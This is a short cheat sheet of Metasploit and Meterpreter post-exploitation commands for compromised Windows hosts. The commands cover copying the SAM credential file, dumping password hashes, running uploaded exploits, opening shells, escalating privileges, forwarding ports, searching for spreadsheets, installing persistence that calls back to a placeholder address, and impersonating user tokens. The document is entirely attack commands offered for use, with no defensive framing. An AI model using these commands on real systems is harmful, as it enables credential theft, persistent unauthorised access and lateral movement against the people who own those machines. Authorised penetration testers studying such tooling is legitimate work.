Useful commands with Meterpreter:
Meterpreter upload file to Windows target:
meterpreter> upload file c:\\windows
Meterpreter download file from Windows target:
meterpreter> download c:\\windows\\repair\\sam /tmp
Meterpreter run .exe on target – handy for executing uploaded exploits:
meterpreter> execute -f c:\\windows\\temp\\exploit.exe
Creates new channel with cmd shell:
meterpreter> execute -f cmd -c
Meterpreter show processes:
meterpreter> ps
Meterpreter get shell on the target:
meterpreter> shell
Meterpreter attempts privilege escalation on the target:
meterpreter> getsystem
Meterpreter attempts to dump the hashes on the target:
meterpreter> hashdump
meterpreter> credcollect
Meterpreter create port forward to target machine:
meterpreter> portfwd add -l 3389 -p 3389 -r $IP
Meterpreter delete port forward:
meterpreter> portfwd delete -l 3389 -p 3389 -r $IP
Search for Excel files on the target machine:
meterpreter> search -f *.xlsx
Get user id:
meterpreter> getuid
Check that the architecture of the process matches the Meterpreter payload; if not, migrate to an x64 process:
meterpreter> sysinfo
Identify other machines that the supplied domain user has administrative access to:
msf> run post/windows/gather/local_admin_search_enum
Connect to a host and port from msfconsole (netcat-like):
msf> connect $TARGET $PORT
Uses SSL:
msf> connect -s $TARGET $PORT
Starts a Ruby shell:
msf> irb
Integrations with other tools (plugins are loaded one at a time):
msf> load pcap
msf> load wmap
msf> load nessus
msf> db_hosts
msf> db_vulns
msf> db_exploited
Meterpreter persistence mode:
meterpreter> run persistence -U -i 5 -p 443 -r $IP
Impersonate any user (token impersonation via the incognito extension):
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token MACHINE\\user
meterpreter> drop_token